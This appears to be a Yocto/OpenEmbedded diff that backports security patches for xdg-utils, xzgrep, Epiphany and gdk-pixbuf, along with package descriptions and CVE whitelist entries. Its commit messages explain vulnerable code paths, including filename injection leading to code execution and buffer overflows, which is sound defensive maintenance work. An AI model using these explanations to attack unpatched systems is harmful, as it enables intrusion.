+- BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+- SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+- BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-
+- if [ -z "$TO" ] ; then
+- NEWMAILTO=
+- else
+- NEWMAILTO="to='$TO'"
+- fi
+- if [ -n "$CC" ] ; then
+- NEWMAILTO="${NEWMAILTO},cc='$CC'"
+- fi
+- if [ -n "$BCC" ] ; then
+- NEWMAILTO="${NEWMAILTO},bcc='$BCC'"
+- fi
+- if [ -n "$SUBJECT" ] ; then
+- NEWMAILTO="${NEWMAILTO},$SUBJECT"
+- fi
+- if [ -n "$BODY" ] ; then
+- NEWMAILTO="${NEWMAILTO},$BODY"
+- fi
+-
+- NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+- DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+- "$THUNDERBIRD" -compose "$NEWMAILTO"
+- if [ $? -eq 0 ]; then
+- exit_success
+- else
+- exit_failure_operation_failed
+- fi
+-}
+-
+ open_kde()
+ {
+- if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then
+- local kreadconfig=kreadconfig$KDE_SESSION_VERSION
+- else
+- local kreadconfig=kreadconfig
+- fi
+-
+- if which $kreadconfig >/dev/null 2>&1; then
+- local profile=$($kreadconfig --file emaildefaults \
+- --group Defaults --key Profile)
+- if [ -n "$profile" ]; then
+- local client=$($kreadconfig --file emaildefaults \
+- --group "PROFILE_$profile" \
+- --key EmailClient \
+- | cut -d ' ' -f 1)
+-
+- if echo "$client" | grep -Eq 'thunderbird|icedove'; then
+- run_thunderbird "$client" "$1"
+- fi
+- fi
+- fi
+-
+ local command
+ case "$KDE_SESSION_VERSION" in
+ '') command=kmailservice ;;
+@@ -130,15 +62,6 @@ open_kde()
+
+ open_gnome3()
+ {
+- local client
+- local desktop
+- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+- client=`desktop_file_to_binary "$desktop"`
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ if gio help open 2>/dev/null 1>&2; then
+ DEBUG 1 "Running gio open \"$1\""
+ gio open "$1"
+@@ -159,13 +82,6 @@ open_gnome3()
+
+ open_gnome()
+ {
+- local client
+- client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command | cut -d ' ' -f 1` || ""
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ if gio help open 2>/dev/null 1>&2; then
+ DEBUG 1 "Running gio open \"$1\""
+ gio open "$1"
+@@ -231,15 +147,6 @@ open_flatpak()
+
+ open_generic()
+ {
+- local client
+- local desktop
+- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+- client=`desktop_file_to_binary "$desktop"`
+- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+- if [ $? -eq 0 ] ; then
+- run_thunderbird "$client" "$1"
+- fi
+-
+ xdg-open "$1"
+ local ret=$?
+
+@@ -364,21 +271,6 @@ while [ $# -gt 0 ] ; do
+ shift
+ ;;
+
+- --attach)
+- if [ -z "$1" ] ; then
+- exit_failure_syntax "file argument missing for --attach option"
+- fi
+- check_input_file "$1"
+- file=`readlink -f "$1"` # Normalize path
+- if [ -z "$file" ] || [ ! -f "$file" ] ; then
+- exit_failure_file_missing "file '$1' does not exist"
+- fi
+-
+- url_encode "$file"
+- options="${options}attach=${result}&"
+- shift
+- ;;
+-
+ -*)
+ exit_failure_syntax "unexpected option '$parm'"
+ ;;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index d371c5c28c..f6989430f5 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
file://0001-Reinstate-xdg-terminal.patch \
file://0001-Don-t-build-the-in-script-manual.patch \
+ file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
+ file://CVE-2022-4055.patch \
"
SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
index 6e43f5be6f..765a34e842 100644
--- a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
+++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
@@ -1,5 +1,6 @@
SUMMARY = "Socket-based service activation daemon"
HOMEPAGE = "https://github.com/xinetd-org/xinetd"
+DESCRIPTION = "xinetd is a powerful replacement for inetd, xinetd has access control mechanisms, extensive logging capabilities, the ability to make services available based on time, can place limits on the number of servers that can be started, and has deployable defence mechanisms to protect against port scanners, among other things."
# xinetd is a BSD-like license
# Apple and Gentoo say BSD here.
@@ -12,7 +13,7 @@ PR = "r2"
# Blacklist a bogus tag in upstream check
UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)"
-SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \
+SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \
file://xinetd.init \
file://xinetd.conf \
file://xinetd.default \
diff --git a/meta/recipes-extended/xz/xz/CVE-2022-1271.patch b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
new file mode 100644
index 0000000000..7841a534d3
--- /dev/null
+++ b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
@@ -0,0 +1,96 @@
+From 6bb2369742f9ff0451c245e8ca9b9dfac0cc88ba Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Tue, 29 Mar 2022 19:19:12 +0300
+Subject: [PATCH] xzgrep: Fix escaping of malicious filenames (ZDI-CAN-16587).
+
+Malicious filenames can make xzgrep to write to arbitrary files
+or (with a GNU sed extension) lead to arbitrary code execution.
+
+xzgrep from XZ Utils versions up to and including 5.2.5 are
+affected. 5.3.1alpha and 5.3.2alpha are affected as well.
+This patch works for all of them.
+
+This bug was inherited from gzip's zgrep. gzip 1.12 includes
+a fix for zgrep.
+
+The issue with the old sed script is that with multiple newlines,
+the N-command will read the second line of input, then the
+s-commands will be skipped because it's not the end of the
+file yet, then a new sed cycle starts and the pattern space
+is printed and emptied. So only the last line or two get escaped.
+
+One way to fix this would be to read all lines into the pattern
+space first. However, the included fix is even simpler: All lines
+except the last line get a backslash appended at the end. To ensure
+that shell command substitution doesn't eat a possible trailing
+newline, a colon is appended to the filename before escaping.
+The colon is later used to separate the filename from the grep
+output so it is fine to add it here instead of a few lines later.
+
+The old code also wasn't POSIX compliant as it used \n in the
+replacement section of the s-command. Using \<newline> is the
+POSIX compatible method.
+
+LC_ALL=C was added to the two critical sed commands. POSIX sed
+manual recommends it when using sed to manipulate pathnames
+because in other locales invalid multibyte sequences might
+cause issues with some sed implementations. In case of GNU sed,
+these particular sed scripts wouldn't have such problems but some
+other scripts could have, see:
+
+ info '(sed)Locale Considerations'
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Thanks to Jim Meyering and Paul Eggert discussing the different
+ways to fix this and for coordinating the patch release schedule
+with gzip.
+
+Upstream-Status: Backport [https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+ src/scripts/xzgrep.in | 20 ++++++++++++--------
+ 1 file changed, 12 insertions(+), 8 deletions(-)
+
+diff --git a/src/scripts/xzgrep.in b/src/scripts/xzgrep.in
+index a1fd19c..da1e65b 100644
+--- a/src/scripts/xzgrep.in
++++ b/src/scripts/xzgrep.in
+@@ -178,22 +178,26 @@ for i; do
+ { test $# -eq 1 || test $no_filename -eq 1; }; then
+ eval "$grep"
+ else
++ # Append a colon so that the last character will never be a newline
++ # which would otherwise get lost in shell command substitution.
++ i="$i:"
++
++ # Escape & \ | and newlines only if such characters are present
++ # (speed optimization).
+ case $i in
+ (*'
+ '* | *'&'* | *'\'* | *'|'*)
+- i=$(printf '%s\n' "$i" |
+- sed '
+- $!N
+- $s/[&\|]/\\&/g
+- $s/\n/\\n/g
+- ');;
++ i=$(printf '%s\n' "$i" | LC_ALL=C sed 's/[&\|]/\\&/g; $!s/$/\\/');;
+ esac
+- sed_script="s|^|$i:|"
++
++ # $i already ends with a colon so don't add it here.
++ sed_script="s|^|$i|"
+
+ # Fail if grep or sed fails.
+ r=$(
+ exec 4>&1
+- (eval "$grep" 4>&-; echo $? >&4) 3>&- | sed "$sed_script" >&3 4>&-
++ (eval "$grep" 4>&-; echo $? >&4) 3>&- |
++ LC_ALL=C sed "$sed_script" >&3 4>&-
+ ) || r=2
+ exit $r
+ fi >&3 5>&-
diff --git a/meta/recipes-extended/xz/xz_5.2.4.bb b/meta/recipes-extended/xz/xz_5.2.4.bb
index 1c4450a9e9..6d80a4f2e9 100644
--- a/meta/recipes-extended/xz/xz_5.2.4.bb
+++ b/meta/recipes-extended/xz/xz_5.2.4.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utilities for managing LZMA compressed files"
HOMEPAGE = "https://tukaani.org/xz/"
+DESCRIPTION = "XZ Utils is free general-purpose data compression software with a high compression ratio. XZ Utils were written for POSIX-like systems, but also work on some not-so-POSIX systems. XZ Utils are the successor to LZMA Utils."
SECTION = "base"
# The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file
@@ -22,7 +23,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=97d554a32881fee0aa283d96e47cb24a \
file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \
"
-SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz"
+SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz \
+ file://CVE-2022-1271.patch \
+ "
SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6"
SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145"
UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar"
diff --git a/meta/recipes-extended/zip/zip_3.0.bb b/meta/recipes-extended/zip/zip_3.0.bb
index c00a932763..18b5d8648e 100644
--- a/meta/recipes-extended/zip/zip_3.0.bb
+++ b/meta/recipes-extended/zip/zip_3.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Compressor/archiver for creating and modifying .zip files"
HOMEPAGE = "http://www.info-zip.org"
+DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
SECTION = "console/utils"
LICENSE = "BSD-3-Clause"
@@ -19,6 +20,12 @@ UPSTREAM_VERSION_UNKNOWN = "1"
SRC_URI[md5sum] = "7b74551e63f8ee6aab6fbc86676c0d37"
SRC_URI[sha256sum] = "f0e8bb1f9b7eb0b01285495a2699df3a4b766784c1765a8f1aeedf63c0806369"
+# Disputed, and Debian doesn't consider it a vulnerability
+CVE_CHECK_WHITELIST += "CVE-2018-13410"
+
+# Not for zip but for a smart contract implementation of it
+CVE_CHECK_WHITELIST += "CVE-2018-13684"
+
# zip.inc sets CFLAGS, but what Makefile actually uses is
# CFLAGS_NOOPT. It will also force -O3 optimization, overriding
# whatever we set.
diff --git a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
index ddb4c2794f..f43bfd6a67 100644
--- a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
+++ b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
@@ -1,4 +1,7 @@
SUMMARY = "WebKit based web browser for GNOME"
+DESCRIPTION = "Epiphany is an open source web browser for the Linux desktop environment. \
+It provides a simple and easy-to-use internet browsing experience."
+HOMEPAGE = "https://wiki.gnome.org/Apps/Web"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/epiphany"
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -13,6 +16,7 @@ REQUIRED_DISTRO_FEATURES = "x11 opengl"
SRC_URI = "${GNOME_MIRROR}/${GNOMEBN}/${@gnome_verdir("${PV}")}/${GNOMEBN}-${PV}.tar.${GNOME_COMPRESS_TYPE};name=archive \
file://0002-help-meson.build-disable-the-use-of-yelp.patch \
+ file://CVE-2022-29536.patch \
"
SRC_URI[archive.md5sum] = "a559f164bb7d6cbeceb348648076830b"
SRC_URI[archive.sha256sum] = "60e190fc07ec7e33472e60c7e633e04004f7e277a0ffc5e9cd413706881e598d"
diff --git a/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
new file mode 100644
index 0000000000..71cfc1238a
--- /dev/null
+++ b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
@@ -0,0 +1,46 @@
+CVE: CVE-2022-29536
+Upstream-Status: Backport [ https://gitlab.gnome.org/GNOME/epiphany/-/commit/486da133569ebfc436c959a7419565ab102e8525 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 486da133569ebfc436c959a7419565ab102e8525 Mon Sep 17 00:00:00 2001
+From: Michael Catanzaro <mcatanzaro@redhat.com>
+Date: Fri, 15 Apr 2022 18:09:46 -0500
+Subject: [PATCH] Fix memory corruption in ephy_string_shorten()
+
+This fixes a regression that I introduced in 232c613472b38ff0d0d97338f366024ddb9cd228.
+
+I got my browser stuck in a crash loop today while visiting a website
+with a page title greater than ephy-embed.c's MAX_TITLE_LENGTH, the only
+condition in which ephy_string_shorten() is ever used. Turns out this
+commit is wrong: an ellipses is a multibyte character (three bytes in
+UTF-8) and so we're writing past the end of the buffer when calling
+strcat() here. Ooops.
+
+Shame it took nearly four years to notice and correct this.
+
+Part-of: <https://gitlab.gnome.org/GNOME/epiphany/-/merge_requests/1106>
+---
+ lib/ephy-string.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/lib/ephy-string.c b/lib/ephy-string.c
+index 35a148ab32..8e524d52ca 100644
+--- a/lib/ephy-string.c
++++ b/lib/ephy-string.c
+@@ -114,11 +114,10 @@ ephy_string_shorten (char *str,
+ /* create string */
+ bytes = GPOINTER_TO_UINT (g_utf8_offset_to_pointer (str, target_length - 1) - str);
+
+- /* +1 for ellipsis, +1 for trailing NUL */
+- new_str = g_new (gchar, bytes + 1 + 1);
++ new_str = g_new (gchar, bytes + strlen ("…") + 1);
+
+ strncpy (new_str, str, bytes);
+- strcat (new_str, "…");
++ strncpy (new_str + bytes, "…", strlen ("…") + 1);
+
+ g_free (str);
+
+--
+GitLab
+
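The commit message above pins the bug on the ellipsis being one character but three bytes in UTF-8, so an allocation of "bytes + 1 + 1" cannot hold the prefix, the ellipsis and the trailing NUL. A tiny, self-contained C illustration of the sizing difference (not Epiphany code; the byte counts are only examples):

#include <stdio.h>
#include <string.h>

int main(void)
{
    const char ellipsis[] = "\xe2\x80\xa6";   /* U+2026 HORIZONTAL ELLIPSIS in UTF-8 */
    size_t prefix_bytes = 5;                  /* bytes kept from the shortened title */

    size_t old_alloc = prefix_bytes + 1 + 1;                /* assumes a 1-byte ellipsis */
    size_t needed    = prefix_bytes + strlen(ellipsis) + 1; /* 3-byte ellipsis + NUL */

    printf("needed=%zu, old allocation=%zu, short by %zu bytes\n",
           needed, old_alloc, needed - old_alloc);
    return 0;
}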
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch
new file mode 100644
index 0000000000..3fef2bc1eb
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch
@@ -0,0 +1,55 @@
+From bdd3acbd48a575d418ba6bf1b32d7bda2fae1c81 Mon Sep 17 00:00:00 2001
+From: Robert Ancell <robert.ancell@canonical.com>
+Date: Mon, 30 Nov 2020 12:26:12 +1300
+Subject: [PATCH 02/13] gif: Fix LZW decoder accepting invalid LZW code.
+
+The code value after a reset wasn't being validated, which means we would
+accept invalid codes. This could cause an infinite loop in the decoder.
+
+Fixes CVE-2020-29385
+
+Fixes https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/164
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/bdd3acbd48a575d418ba6bf1b32d7bda2fae1c81]
+CVE: CVE-2020-29385
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ gdk-pixbuf/lzw.c | 13 +++++++------
+ 1 files changed, 7 insertions(+), 6 deletions(-)
+ create mode 100644 tests/test-images/fail/hang_114.gif
+
+diff --git a/gdk-pixbuf/lzw.c b/gdk-pixbuf/lzw.c
+index 9e052a6f7..105daf2b1 100644
+--- a/gdk-pixbuf/lzw.c
++++ b/gdk-pixbuf/lzw.c
+@@ -195,19 +195,20 @@ lzw_decoder_feed (LZWDecoder *self,
+ if (self->last_code != self->clear_code && self->code_table_size < MAX_CODES) {
+ if (self->code < self->code_table_size)
+ add_code (self, self->code);
+- else if (self->code == self->code_table_size)
++ else
+ add_code (self, self->last_code);
+- else {
+- /* Invalid code received - just stop here */
+- self->last_code = self->eoi_code;
+- return output_length;
+- }
+
+ /* When table is full increase code size */
+ if (self->code_table_size == (1 << self->code_size) && self->code_size < LZW_CODE_MAX)
+ self->code_size++;
+ }
+
++ /* Invalid code received - just stop here */
++ if (self->code >= self->code_table_size) {
++ self->last_code = self->eoi_code;
++ return output_length;
++ }
++
+ /* Convert codeword into indexes */
+ n_written += write_indexes (self, output + n_written, output_length - n_written);
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
new file mode 100644
index 0000000000..fe594b24bb
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
@@ -0,0 +1,40 @@
+From 086e8adf4cc352cd11572f96066b001b545f354e Mon Sep 17 00:00:00 2001
+From: Emmanuele Bassi <ebassi@gnome.org>
+Date: Wed, 1 Apr 2020 18:11:55 +0100
+Subject: [PATCH] Check the memset length argument
+
+Avoid overflows by using the checked multiplication macro for gsize.
+
+Fixes: #132
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e]
+CVE: CVE-2021-20240
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index c9db3c66e..49674fd2e 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -412,11 +412,15 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+
+ /* If no rendered frame, render the first frame */
+ if (anim->last_frame == NULL) {
++ gsize len = 0;
+ if (anim->last_frame_data == NULL)
+ anim->last_frame_data = gdk_pixbuf_new (GDK_COLORSPACE_RGB, TRUE, 8, anim->width, anim->height);
+ if (anim->last_frame_data == NULL)
+ return NULL;
+- memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, gdk_pixbuf_get_rowstride (anim->last_frame_data) * anim->height);
++ if (g_size_checked_mul (&len, gdk_pixbuf_get_rowstride (anim->last_frame_data), anim->height))
++ memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, len);
++ else
++ return NULL;
+ composite_frame (anim, g_list_nth_data (anim->frames, 0));
+ }
+
+--
+GitLab
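This patch and CVE-2021-46829.patch below both lean on GLib's overflow-checked arithmetic (g_size_checked_mul, g_size_checked_add) so a rowstride-times-height product is rejected instead of wrapping around before it is used as a memset() length or pixel offset. A dependency-free C sketch of the same guard, with illustrative names (not gdk-pixbuf code):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Store a * b in *out and return 1 only if the product fits in size_t. */
static int checked_mul(size_t a, size_t b, size_t *out)
{
    if (b != 0 && a > SIZE_MAX / b)
        return 0;                       /* would overflow: refuse */
    *out = a * b;
    return 1;
}

int main(void)
{
    unsigned char pixels[64];
    size_t rowstride = 8, height = 8, len;

    if (checked_mul(rowstride, height, &len) && len <= sizeof pixels)
        memset(pixels, 0, len);         /* len is known not to have wrapped */
    else
        fprintf(stderr, "size overflow, bailing out\n");
    return 0;
}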
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
new file mode 100644
index 0000000000..b29ab209ce
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
@@ -0,0 +1,61 @@
+From bdf3a2630c02a63803309cf0ad4b274234c814ce Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 9 Aug 2022 09:45:42 +0530
+Subject: [PATCH] CVE-2021-46829
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/5398f04d772f7f8baf5265715696ed88db0f0512]
+CVE: CVE-2021-46829
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ gdk-pixbuf/io-gif-animation.c | 21 +++++++++++++--------
+ 1 file changed, 13 insertions(+), 8 deletions(-)
+
+diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
+index d742963..9544391 100644
+--- a/gdk-pixbuf/io-gif-animation.c
++++ b/gdk-pixbuf/io-gif-animation.c
+@@ -364,7 +364,7 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
+ for (i = 0; i < n_indexes; i++) {
+ guint8 index = index_buffer[i];
+ guint x, y;
+- int offset;
++ gsize offset;
+
+ if (index == frame->transparent_index)
+ continue;
+@@ -374,11 +374,13 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
+ if (x >= anim->width || y >= anim->height)
+ continue;
+
+- offset = y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + x * 4;
+- pixels[offset + 0] = frame->color_map[index * 3 + 0];
+- pixels[offset + 1] = frame->color_map[index * 3 + 1];
+- pixels[offset + 2] = frame->color_map[index * 3 + 2];
+- pixels[offset + 3] = 255;
++ if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
++ g_size_checked_add (&offset, offset, x * 4)) {
++ pixels[offset + 0] = frame->color_map[index * 3 + 0];
++ pixels[offset + 1] = frame->color_map[index * 3 + 1];
++ pixels[offset + 2] = frame->color_map[index * 3 + 2];
++ pixels[offset + 3] = 255;
++ }
+ }
+
+ out:
+@@ -443,8 +445,11 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
+ x_end = MIN (anim->last_frame->x_offset + anim->last_frame->width, anim->width);
+ y_end = MIN (anim->last_frame->y_offset + anim->last_frame->height, anim->height);
+ for (y = anim->last_frame->y_offset; y < y_end; y++) {
+- guchar *line = pixels + y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + anim->last_frame->x_offset * 4;
+- memset (line, 0, (x_end - anim->last_frame->x_offset) * 4);
++ gsize offset;
++ if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
++ g_size_checked_add (&offset, offset, anim->last_frame->x_offset * 4)) {
++ memset (pixels + offset, 0, (x_end - anim->last_frame->x_offset) * 4);
++ }
+ }
+ break;
+ case GDK_PIXBUF_FRAME_REVERT:
+--
+2.25.1
+
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
index 0405fa78b5..1171e6cc11 100644
--- a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
@@ -24,6 +24,9 @@ SRC_URI = "${GNOME_MIRROR}/${BPN}/${MAJ_VER}/${BPN}-${PV}.tar.xz \
file://0004-Do-not-run-tests-when-building.patch \
file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \
file://missing-test-data.patch \
+ file://CVE-2020-29385.patch \
+ file://CVE-2021-20240.patch \
+ file://CVE-2021-46829.patch \
"
SRC_URI_append_class-target = " \
diff --git a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
index 3a2727b701..5503f225bb 100644
--- a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
+++ b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "GTK+ icon theme"
+DESCRIPTION = "The Adwaita icon theme is the default icon theme of the GNOME desktop \
+This package package contains an icon theme for Gtk+ 3 applications."
HOMEPAGE = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme/issues"
SECTION = "x11/gnome"
diff --git a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
index 92b0d1d52f..0842f10ea9 100644
--- a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
+++ b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
@@ -102,7 +102,7 @@ EOF
# from the target sysroot.
cat > ${B}/g-ir-scanner-wrapper << EOF
#!/bin/sh
-# This prevents g-ir-scanner from writing cache data to $HOME
+# This prevents g-ir-scanner from writing cache data to the user's HOME dir
export GI_SCANNER_DISABLE_CACHE=1
g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@"
diff --git a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
index 0306b04f4e..6b59029255 100644
--- a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
+++ b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
@@ -1,4 +1,8 @@
SUMMARY = "Library for sending desktop notifications to a notification daemon"
+DESCRIPTION = "It sends desktop notifications to a notification daemon, as defined \
+in the Desktop Notifications spec. These notifications can be used to inform \
+the user about an event or display some form of information without getting \
+in the user's way."
HOMEPAGE = "https://gitlab.gnome.org/GNOME/libnotify"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/libnotify/issues"
SECTION = "libs"
@@ -20,3 +24,6 @@ PROVIDES += "libnotify3"
RPROVIDES_${PN} += "libnotify3"
RCONFLICTS_${PN} += "libnotify3"
RREPLACES_${PN} += "libnotify3"
+
+# -7381 is specific to the NodeJS bindings
+CVE_CHECK_WHITELIST += "CVE-2013-7381"
diff --git a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
index 237aec6062..ef1dae0a69 100644
--- a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
+++ b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
@@ -25,6 +25,9 @@ SRC_URI += "file://gtk-option.patch \
SRC_URI[archive.sha256sum] = "f7628905f1cada84e87e2b14883ed57d8094dca3281d5bcb24ece4279e9a92ba"
+# Issue only on Windows
+CVE_CHECK_WHITELIST += "CVE-2018-1000041"
+
CACHED_CONFIGUREVARS = "ac_cv_path_GDK_PIXBUF_QUERYLOADERS=${STAGING_LIBDIR_NATIVE}/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders"
PACKAGECONFIG ??= "gdkpixbuf"
diff --git a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
index 72511af02d..8b5d301515 100644
--- a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
+++ b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
@@ -4,6 +4,7 @@ the freedesktop.org project, a cross-desktop effort to access passwords, \
tokens and other types of secrets. libsecret provides a convenient wrapper \
for these methods so consumers do not have to call the low-level DBus methods."
LICENSE = "LGPLv2.1"
+HOMEPAGE = "https://github.com/GNOME/libsecret"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/libsecret/issues"
